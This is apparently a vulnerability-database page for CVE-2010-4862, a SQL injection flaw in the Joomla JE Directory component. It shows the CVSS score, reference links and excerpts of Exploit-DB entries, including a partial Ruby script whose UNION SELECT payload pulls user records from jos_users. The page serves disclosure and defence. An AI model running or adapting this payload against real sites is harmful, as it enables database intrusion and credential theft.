CVE-2010-4862
published 2011-10-05CVE-2010-4862: SQL injection vulnerability in the JExtensions JE Directory (com_jedirectory) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
59.9th percentile
SQL injection vulnerability in the JExtensions JE Directory (com_jedirectory) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| harmistechnology | com_jedirectory | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Douran 3.9.7.8 - File Download/Source Code Disclosure
exploitdb·2011-03-20
CVE-2011-1569 Douran 3.9.7.8 - File Download/Source Code Disclosure
Douran 3.9.7.8 - File Download/Source Code Disclosure
---
# Title: [Douran Portal File Download/Source Code Disclosure Vulnerability]
# Date of Publishing: [16 March 2010]
# Application Name: [Douran Portal]
# Version: [3.9.7.8]
# Impact: [Medium]
# Vendor: www.douran.com
# Link: http://douran.com/HomePage.aspx?TabID=4862
# Vendor Response(s): They didn't respond to the emails.
# Credit to: AJAX Security Team
# Finder(s):
- HUrr!c4nE! (bl4ck.k3yv4n [at] yahoo [dot] com) (ajaxtm.com)
- Soroush Dalili (Irsdl [at] yahoo [dot] com) (secproject.com)
# Description:
Regarding attack technique [1], it is possible to bypass the security protections of /download.aspx in Douran Portal and download the hosted files.
# PoC(s):
Try this first and see the access denied error: http://[HOST]/download
Exploit-DB
Joomla! Component JE Directory 1.0 - SQL Injection
exploitdb·2010-09-30
CVE-2010-4862 Joomla! Component JE Directory 1.0 - SQL Injection
Joomla! Component JE Directory 1.0 - SQL Injection
---
----------------------------Information------------------------------------------------
+Name : joomla JE Directory "
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
print "\nEnter the id (id)->"
userid=gets.chomp
print "#########################################################"
begin
dir = "index.php?option=com_jedirectory&view=item&catid="+
"1+uNiOn+sElEcT+1,2,concat(0x23,0x23,0x23,0x23,0x23,id,"+
"0x23,0x23,0x23,0x23,0x23),4,5,6,7,8,9,10,11+from+"+
"jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nid -> "+(/#####(.+)#####/).
No writeups or analysis indexed.
http://osvdb.org/68308http://secunia.com/advisories/41681http://www.exploit-db.com/exploits/15163http://www.securityfocus.com/bid/43630https://exchange.xforce.ibmcloud.com/vulnerabilities/62191http://osvdb.org/68308http://secunia.com/advisories/41681http://www.exploit-db.com/exploits/15163http://www.securityfocus.com/bid/43630https://exchange.xforce.ibmcloud.com/vulnerabilities/62191
2011-10-05
Published